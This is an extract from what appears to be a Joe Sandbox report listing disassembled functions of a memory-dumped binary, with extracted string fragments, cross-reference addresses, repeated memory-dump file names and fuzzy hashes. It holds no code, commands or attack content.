Function 00948B1B Relevance: 9.7, Strings: 7, Instructions: 994COMMON

Download Yara Rule

Strings

_^]\, xrefs: 00948F25
/, xrefs: 009492BA
_^]\, xrefs: 00949425
_^]\, xrefs: 00948DE5
_^]\, xrefs: 00949115
BVLm, xrefs: 0094902A
_^]\, xrefs: 00948B44

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: InitializeThunk
String ID: /$BVLm$_^]\$_^]\$_^]\$_^]\$_^]\
API String ID: 2994545307-2892575238
Opcode ID: f23796022441b535d5ab6f9b3e6792017a3ba8a8fdf1d20338fcebe13a414bbe
Instruction ID: d7f8b3db2d81de3842e98a696f27e5463105a924db3ca93f2d320e0d68f87b19
Opcode Fuzzy Hash: f23796022441b535d5ab6f9b3e6792017a3ba8a8fdf1d20338fcebe13a414bbe
Instruction Fuzzy Hash: 16324AB261C3418FD7288B38CC91B7FB796FBD6314F19496CD0DA872A5DB3189428B52

Function 00939310 Relevance: 9.2, Strings: 7, Instructions: 431COMMON

Download Yara Rule

Strings

cbrn, xrefs: 009393EE
WAg., xrefs: 0093943E
;"I, xrefs: 0093944E
,6.2, xrefs: 00939446
PTvu, xrefs: 009396F3
FM, xrefs: 00939370
A, xrefs: 00939698

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
API String ID: 0-3116088196
Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
Instruction ID: 6e1d25be6ef6630525bb865031a58ebf86359c2fcf708bc67ffc8b7c3ac84525
Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
Instruction Fuzzy Hash: 09C1267260C3D54BD322CF6994A075BFFD19FD6310F084AACE8D51B386D2B5890ACB92

Function 0093AB40 Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

UMAG, xrefs: 0093AEF0
>, xrefs: 0093AB5E
HYZF, xrefs: 0093AE40
HYZF, xrefs: 0093AE05, 0093B075, 0093B07E
Y2^0, xrefs: 0093AC7B
]><, xrefs: 0093AC83

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID:
String ID: >$HYZF$HYZF$UMAG$Y2^0$]><
API String ID: 0-2666672646
Opcode ID: 8dd838afd2c3ad2d19294fe261c2aab78e4c268717ee3285c3e4a094e0395579
Instruction ID: 5225c3f531b990fb33c1ef205d79e1cda2e4688ec50139cb23e30eb39efcd659
Opcode Fuzzy Hash: 8dd838afd2c3ad2d19294fe261c2aab78e4c268717ee3285c3e4a094e0395579
Instruction Fuzzy Hash: DAE13B7674C7504BD328CF6888502AFBBE6DFC1304F18892DE5E99B345DB79C9058B86

Function 009581CC Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 593COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009584BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009585B4

Strings

_^]\, xrefs: 00958A15
LF7Y, xrefs: 00958951

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: 14d8ee5f7146272b0106aaa9a61390bcc6c6e02f313294868d7097d14535bb70
Instruction ID: 5df97cc7906f5cea499f7407e69c5efaba8d776b7eb90583a6d08b47650b3466
Opcode Fuzzy Hash: 14d8ee5f7146272b0106aaa9a61390bcc6c6e02f313294868d7097d14535bb70
Instruction Fuzzy Hash: 4D22FF7291C341CFE324CF29D88072FBBE1BF89311F194A6CE999572A1D7319945CB92

Function 009583D8 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 542COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009584BD
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 009585B4

Strings

_^]\, xrefs: 00958A15
LF7Y, xrefs: 00958951

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: LF7Y$_^]\
API String ID: 237503144-3688711800
Opcode ID: 743be843df4e32338bcf0c1caa91478fd7fefeb9dc396d62c659145a55edd67a
Instruction ID: 2656932e20f78d61534e9e94687068d2aafd7c30f93dd535b276784b02cb4004
Opcode Fuzzy Hash: 743be843df4e32338bcf0c1caa91478fd7fefeb9dc396d62c659145a55edd67a
Instruction Fuzzy Hash: 60120F7291C341CFE324CF29D88072FBBE1BF89311F194A6CE999672A1D7319945CB92

Function 0096CDF0 Relevance: 6.9, Strings: 5, Instructions: 697COMMON

Download Yara Rule

Strings

fiP, xrefs: 0096D2CF
_^]\, xrefs: 0096D006
_^]\, xrefs: 0096CE29
f, xrefs: 0096D081
jiP, xrefs: 0096D301

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
